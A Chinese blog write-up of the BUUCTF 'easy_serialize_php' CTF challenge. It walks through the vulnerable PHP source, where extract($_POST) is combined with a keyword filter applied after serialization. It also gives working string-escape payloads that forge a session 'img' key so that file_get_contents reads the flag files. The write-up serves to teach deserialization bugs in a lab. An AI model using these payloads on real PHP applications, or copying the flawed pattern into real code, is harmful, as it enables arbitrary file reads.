BUUCTF - Web - easy_serialize_php

最新推荐文章于 2022-10-12 11:34:58 发布
最新推荐文章于 2022-10-12 11:34:58 发布
阅读量432 收藏 3
点赞数 2
分类专栏: ctf Writeup 文章标签: php 前端 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SuichI314/article/details/121722009
版权

文章目录

源码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

分析

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
  • GET方式接收f传参并赋给$function
  • 定义了一个filter()函数,它接收一个字符串并将phpflagphp5php4f1lg字符替换为空并返回
if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);
  • if语句清空$_SESSION
  • 定义两个$_SESSION的键值对,第二个是之前GET方式接收的f传参
  • extract()函数将变量从数组中导入到当前的符号集中,可以用它覆盖$_SESSION
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
  • GET方式接收img_path并用base64、SHA1加密再赋给$_SESSION['img'];这里如果不传img的时候,会自动将guest_img.pngbase64加密并赋给img
$serialize_info = filter(serialize($_SESSION));
  • $_SESSION数组序列化后的字符串用filter()方法过滤并赋给$serialize_info
if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}
  • 如果?f=phpinfo,就会执行phpinfo()
  • 如果?f=show_img,就会将之前序列化后的$_SESSION反序列化,再将他的'img'的值base64解密后读入一个字符串中,最后用echo输出
  1. 都能分析出来但没啥思路,看一下phpinfo()
    请添加图片描述
    可以看到在页面底部加载了d0g3_f1ag.php,这可能就是flag,所以当$_SESSION['img']='d0g3_f1ag.php'的时候,可以拿到flag
  2. ?f=show_image的时候,可以拿到flag,但是要绕过

知识点

  • 字符逃逸
    在反序列化的时候,当花括号后仍有字符串,会被忽略掉
<?php

$b = 'a:2:{s:4:"user";s:5:"guest";s:4:"flag";s:3:"asd";}qwe';
var_dump(unserialize($b));
?>

/*
array(2) {
  'user' =>
  string(5) "guest"
  'flag' =>
  string(3) "asd"
}
*/
  • 在反序列化的过程中,如果前面写的n,就会向后面拿n个,写个例子感受一下
<?php

$b = 'a:2:{s:4:"user";s:13:"guest";s:1:"a";s:4:"flag";s:3:"asd";}';
var_dump(unserialize($b));
 ?>

/*
array(2) {
  'user' =>
  string(13) "guest";s:1:"a"
  'flag' =>
  string(3) "asd"
}
*/

payload

  1. 想要拿到flag,img键对应的值就应该是d0g3_f1ag.php的base64编码后的值:ZDBnM19mMWFnLnBocA==;他的序列化后为:
<?php
$a = 'd0g3_f1ag.php';
$b = base64_encode($a);
$c['img'] = $b;
echo serialize($c);
# a:1:{s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
  1. 当不传img的时候,他会自动将guest_img.png加密后赋给$_SESSION['img'],此时他序列化后为:
<?php
$a = 'guest_img.png';
$b = base64_encode($a);
$c['img'] = $b;
echo serialize($c);
# a:1:{s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
  1. 我们知道了传进去的一些字符串会被filter()过滤掉、反序列化时花括号后的会被忽略、固定的个数寻找机制,可以做一些有意思的事情:
    如果SESSION的键是phpflag的时候,就会被过滤而造成字符空缺,使得双引号包含其后的7个字符,我们只需要在适当的位置补上双引号,就可以完美闭合。
    不难看出,我们传POST先于给img键赋值:
    在这里插入图片描述
    我们可以构造这个字符数差,最终让花括号闭合掉s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";},而真正的img对应的值,是我们用POST传入的ZDBnM19mMWFnLnBocA==

构造如下:
$_SESSION['phpflag']=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
原本我们不传POST的序列化结果为:a:1:{s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
我们传的值会被序列化成:

<?php
$a['phpflag'] = ';s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$a['img'] = 'Z3Vlc3RfaW1nLnBuZw==';
echo serialize($a);
# a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
  • 第一个键值对:“";s:48:”=>“1
  • 第二个键值对:“img”=>“ZDBnM19mMWFnLnBocA==

花括号后面的被忽略,将上述序列化后的字符串手动去掉phpflag,反序列化看一下:

<?php
$a = 'a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}';
var_dump(unserialize($a));
$b = unserialize($a);
echo base64_decode($b['img']);
/*
array(2) {
  '";s:48:' =>
  string(1) "1"
  'img' =>
  string(20) "ZDBnM19mMWFnLnBocA=="
}
d0g3_f1ag.php
*/

可以看到,img对应的已经成了d0g3_f1ag.php
在这里插入图片描述
页面上没有回显,看一下源码
在这里插入图片描述
提示说flag在/d0g3_fllllllag里,那就将此字符串加密传入_SESSION['phpflag']=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";},得到flag

其他解法

上面是前几天写的,可能说的不是很清楚,这里先总结一下:

extract($_POST);

$_SESSION['img'] = base64_encode('guest_img.png');

$serialize_info = filter(serialize($_SESSION));

$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));

其实就是这么几句,让传一个POST;
它自动将错文件加密后赋值;
当我们GET传入相应值的时候他就对上述文件解密查看是否正确

那我们的思路就是借用extract($_POST)传入正确的加密后文件,再利用filter()过滤字符串的作用制造字符空缺,促成花括号闭合错误文件。

之前用的方法是过滤phpflag,实质就是过滤 7 个字符,那我们能不能过滤八个字符?

flagflag

写道这里,大概就知道phpflagphp5php4f1lg这五个是干嘛的了。凑字数。。。

这里凑八个字符数:

<?php
$a['flagflag'] = '";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$a['img'] = 'Z3Vlc3RfaW1nLnBuZw==';
echo serialize($a);

# a:2:{s:8:"flagflag";s:49:"";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

过滤后:
第一个键值对:"";s:49:""=>"1"
第二个键值对:"img"=>"ZDBnM19mMWFnLnBocA=="

手动去掉这八个字符看一下

$a = 'a:2:{s:8:"";s:49:"";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}';
$b = unserialize($a);
var_dump($b);
echo base64_decode($b['img']);

/*
array(2) {
  '";s:49:"' =>
  string(1) "1"
  'img' =>
  string(20) "ZDBnM19mMWFnLnBocA=="
}
d0g3_f1ag.php
*/

无数种解法

既然可以凑八个字符,可不可以凑11个?12个?

第八个是用引号凑得字符,那也可以写一堆引号嘛:

<?php
$a['flagflagflag'] = '""""";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$a['img'] = 'Z3Vlc3RfaW1nLnBuZw==';
echo serialize($a);

# a:2:{s:12:"flagflagflag";s:53:"""""";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

手动去掉flagflag

$a = 'a:2:{s:12:"";s:53:"""""";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}';
$b = unserialize($a);
var_dump($b);
echo base64_decode($b['img']);

/*
array(2) {
  '";s:53:"""""' =>
  string(1) "1"
  'img' =>
  string(20) "ZDBnM19mMWFnLnBocA=="
}
d0g3_f1ag.php
*/

总结

其实说是无数种解法,实质就是一种(算了不解释了,废话太多,上面都有):

<?php
// $a['flagflagflag'] = '""""";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
// $a['img'] = 'Z3Vlc3RfaW1nLnBuZw==';
// echo serialize($a);

// $a = 'a:2:{s:12:"";s:53:"""""";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}';
// $b = unserialize($a);
// var_dump($b);
// echo base64_decode($b['img']);

这道题和烨师傅的ezPop一样绕绕的,但也是很牛逼的题,值得再次复现!

1ta-chi
关注
专栏目录
easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
qwsn
11-24 1745
0x01、Web 1.easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF] 第一步:打开题目环境,进入题目链接,代码审计 <?php $function = @$_GET['f']; //GET传参:f function filter($img){ //函数:filter(),使用$img传参 $filter_arr = array('php','flag','php5','ph
BUUCTF-WEB
ccfly1012的博客
11-02 3865
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
buuctf web easy_serialize_php1
qq_41696858的博客
12-09 501
审计源码 <?php $function = @$_GET['f']; //正则匹配 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SES
buuctf easy_serialize_php
qq_52671379的博客
03-30 1903
buuctf easy_serialize_php
web buuctf [安洵杯 2019]easy_serialize_php
weixin_44214568的博客
04-02 486
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
BUUCTF Web [安洵杯 2019]easy_serialize_php1
网安小趴菜
10-12 499
BUUCTF Web [安洵杯 2019]easy_serialize_php1
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3757
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客大挑战 2019]Http 修改头 [...
BUUCTF-WriteUp
鱼的博客
02-01 737
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
[BUUCTF][VNCTF2022公开赛]web wp
m0_67403240的博客
03-09 875
GameV4.0 base64解码即可 newcalc0 镜像为node:lts-alpine,package.json全部为最新包 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json(
buuctf-[安洵杯 2019]easy_serialize_php (小宇特详解)
小宇的web博客
02-24 1910
buuctf-[安洵杯 2019]easy_serialize_php (小宇特详解) 1.先看题目,出现了一段代码,进行代码审计 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_repla
BUUCTF:[安洵杯 2019]easy_serialize_php
qq_46230755的博客
12-30 866
看题目,应该是和反序列化有关。 先查看一下源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){
BUUCTF [安洵杯 2019]easy_serialize_php
qq_53863234的博客
12-19 2240
反序列化字符串逃逸
BUUCTF】[安洵杯 2019]easy_serialize_php
aoao331198的博客
05-03 1289
直接看到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION)
BUUCTF之[安洵杯 2019]easy_serialize_php--WP
weixin_51313108的博客
08-26 521
easy_serialize_php考点Write Up 考点 PHP中反序列化的对象逃逸 俩种过滤函数:关键词增加和关键词减少 反序列化对象的逃逸有俩种策略:1.值逃逸 2.键逃逸 键/值逃逸: 因为序列化的字符串是严格的,对应的格式不能错,比如s:4:“name”,那s:4就必须有一个字符串长度是4的否则就往后要。 并且反序列化会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号{}外的就都被扔掉。 Write Up $function = @$_GET['f']; function
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计
weixin_44632787的博客
07-28 1718
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计 知识点 反序列化中的对象逃逸 extract()变量覆盖 虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来… 废话不多说,放代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','
[安洵杯 2019]easy_serialize_php
05-19 220
<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } $.
[安洵杯 2019]easy_serialize_php 1
shinygod的博客
03-04 1841
知识点:反序列化字符串逃逸(2种情形),extract变量覆盖漏洞 目录反序列化字符串逃逸反序列化的规则00x1:过滤后字符变多00x1:过滤后字符变少(本题就是此类型)值替换键替换 反序列化字符串逃逸 一般这类漏洞,都是在序列化之后,过滤,然后反序列化引起的。 反序列化的规则 了解反序列化字符串逃逸之前,先了解反序列化的规则 例如: a:2:{s:4:"user";s:5:"guest";s:8:"function";s:3:"aaa";} //第一个a代表这是一个数组序列化 php反序列化会以 ;
easy_serialize_php
最新发布
03-16
easy_serialize_php 是一个 PHP 库,用于将 PHP 对象序列化为字符串,以便在不同的应用程序之间传输和存储。它提供了一种简单的方法来序列化和反序列化 PHP 对象,使得数据传输和存储变得更加方便和高效。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1ta-chi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值